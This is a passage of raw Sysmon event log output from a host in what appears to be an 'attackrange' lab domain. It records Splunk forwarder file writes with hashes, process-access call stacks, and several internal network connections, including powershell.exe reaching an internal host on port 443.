Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:24.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4D2DAA1D2776C1447E5E47840DE79A8A,SHA256=891DB761E9EB221EA0A8B658022349C47E4CA9E470D3113AA64407F3DEADFB12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:24.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F8D28D002E0F7996F1F8E36176C32D1,SHA256=6491219D23A2EBD731AA4E3D7659952ECF86049FB3C71F2D581A37908B217720,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:50.586{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52470-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:50.050{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52469-false10.0.1.12-8089- 23542300x800000000000000035342804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:25.199{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3F1E74FE7514F7C6E121CDFA740986A,SHA256=1E9216401359974176465C4975A792E415C27EF96A518C6ED402486F0330D85A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:26.218{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCADF568306D1BC8ACCCCCEF4BA69D51,SHA256=AEF966A3F8834A0F52F4A66CF67507C81941547E2750AAC236DFE2696A4052CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:27.232{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C7BFC39EEFBBA2748268FAFF64AAA7C,SHA256=1132B8A4F04A045D9B39D9472EA54EA630B21C9B77D53BD00B485981ED6F58E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:28.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=275525AFC1259B94E983CCDD88691984,SHA256=EB3D2FC92F0B853C2001A8E2B578A0295F2003E5B75125693721F009803DAAED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:55.601{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52472-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:55.086{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52471-false10.0.1.12-8000- 23542300x800000000000000035342811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:29.614{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E30AB811B1A46855234115DF1FFA04E7,SHA256=D24595B4D6B7A7B58BCA14A80193C0FDEFE7627CFE169F9B6232E2A666883E70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:29.267{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4BDB1C27E73BF956974E40E2E1B46A4,SHA256=5A78705494CC3A6FDC31C5ED086ED87FB71B67E9540327D58954234EA330CD2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:30.298{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5B745C627AE8F4689481DFACD36A47E,SHA256=0B1146CA6162152C1A51686DD16828391592A8466A344BE46C37839C423BD57B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.812{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-734B-613B-43B4-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.812{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.812{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.812{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.812{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.812{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-734B-613B-43B4-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.812{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-734B-613B-43B4-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.797{B81B27B7-734B-613B-43B4-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.313{B81B27B7-734B-613B-42B4-03000000C801}60126448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.313{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7129490556C07AA38610AA17A67046D,SHA256=EEE1B129263E4B2D2E3F8D53FEA0A63C7A2F9CAE37AEBC2FF3946658CED88C83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.129{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-734B-613B-42B4-03000000C801}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.129{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.129{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.129{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.129{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.129{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-734B-613B-42B4-03000000C801}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.129{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-734B-613B-42B4-03000000C801}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:31.114{B81B27B7-734B-613B-42B4-03000000C801}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.445{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-734C-613B-44B4-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.428{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.428{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.428{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+5